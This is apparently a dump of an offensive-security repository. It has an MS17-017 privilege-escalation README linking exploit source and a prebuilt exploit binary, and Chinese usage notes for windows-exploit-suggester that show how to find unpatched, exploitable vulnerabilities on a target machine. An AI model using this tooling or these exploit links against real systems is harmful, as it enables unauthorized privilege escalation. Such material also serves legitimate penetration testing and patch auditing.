/MS17-017/README.md: -------------------------------------------------------------------------------- 1 | # MS17-017 2 | 3 | This security update resolves vulnerabilities in Microsoft Windows. The vulnerabilities could allow elevation of privilege if an attacker runs a specially crafted application. 4 | 5 | ![ms17-017.jpg](ms17-017.jpg) 6 | 7 | 8 | 9 | ### References 10 | 11 | * Source: https://github.com/sensepost/gdi-palettes-exp 12 | * Binary: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42432.exe 13 | * https://www.exploit-db.com/exploits/42432/ 14 | 15 | -------------------------------------------------------------------------------- /MS17-017/gdi-palettes-exp.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS17-017/gdi-palettes-exp.zip -------------------------------------------------------------------------------- /MS17-017/ms17-017.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS17-017/ms17-017.jpg -------------------------------------------------------------------------------- /win-exp-suggester/2017-06-14-mssb.xls: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/win-exp-suggester/2017-06-14-mssb.xls -------------------------------------------------------------------------------- /win-exp-suggester/help.md: -------------------------------------------------------------------------------- 1 | ## 使用方法 2 | 3 | 1.首先需要更新漏洞数据库 4 | ``` 5 | $ ./windows-exploit-suggester.py --update 6 | [*] initiating... 7 | [*] successfully requested base url 8 | [*] scraped ms download url 9 | [+] writing to file 2017-06-14-mssb.xls 10 | [*] done 11 | ``` 12 | 13 | 2.然后安装程序依赖:[python-xlrd](https://pypi.python.org/pypi/xlrd) 14 | ``` 15 | ubuntu@ubuntu:~/xlrd-0.9.4/xlrd-0.9.4$ sudo python setup.py install 16 | [sudo] password for ubuntu: 17 | running install 18 | running build 19 | running build_py 20 | running build_scripts 21 | running install_lib 22 | creating /usr/local/lib/python2.7/dist-packages/xlrd 23 | copying build/lib.linux-x86_64-2.7/xlrd/compdoc.py -> /usr/local/lib/python2.7/dist-packages/xlrd 24 | ...... 25 | ``` 26 | 27 | 3.接着在目标机器中执行systeminfo,并将其输出到文件 win7sp1-systeminfo.txt 中,然而带入参数 –systeminfo 中,并指定数据库位置(就是那个excel文件) 28 | ``` 29 | $ ./windows-exploit-suggester.py --database 2017-06-14-mssb.xls --systeminfo win7sp1-systeminfo.txt 30 | [*] initiating... 31 | [*] database file detected as xls or xlsx based on extension 32 | [*] reading from the systeminfo input file 33 | [*] querying database file for potential vulnerabilities 34 | [*] comparing the 15 hotfix(es) against the 173 potential bulletins(s) 35 | [*] there are now 168 remaining vulns 36 | [+] windows version identified as 'Windows 7 SP1 32-bit' 37 | [*] 38 | [M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical 39 | [E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important 40 | [M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical 41 | [M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical 42 | [M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical 43 | [M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical 44 | [M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical 45 | [M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical 46 | [M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical 47 | [M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important 48 | [*] done 49 | ``` 50 | 下面这条指令可以列出指定操作系统版本存在的所有可能EXP(假设目标系统没有打任何补丁) 51 | ``` 52 | $ ./windows-exploit-suggester.py --database 2017-06-14-mssb.xls --ostext 'windows server 2008 r2' 53 | [*] initiating... 54 | [*] database file detected as xls or xlsx based on extension 55 | [*] getting OS information from command line text 56 | [*] querying database file for potential vulnerabilities 57 | [*] comparing the 0 hotfix(es) against the 196 potential bulletins(s) 58 | [*] there are now 196 remaining vulns 59 | [+] windows version identified as 'Windows 2008 R2 64-bit' 60 | [*] 61 | [M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical 62 | [M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important 63 | [E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important 64 | [M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important 65 | [M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical 66 | [E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Im 67 | ``` --------------------------------------------------------------------------------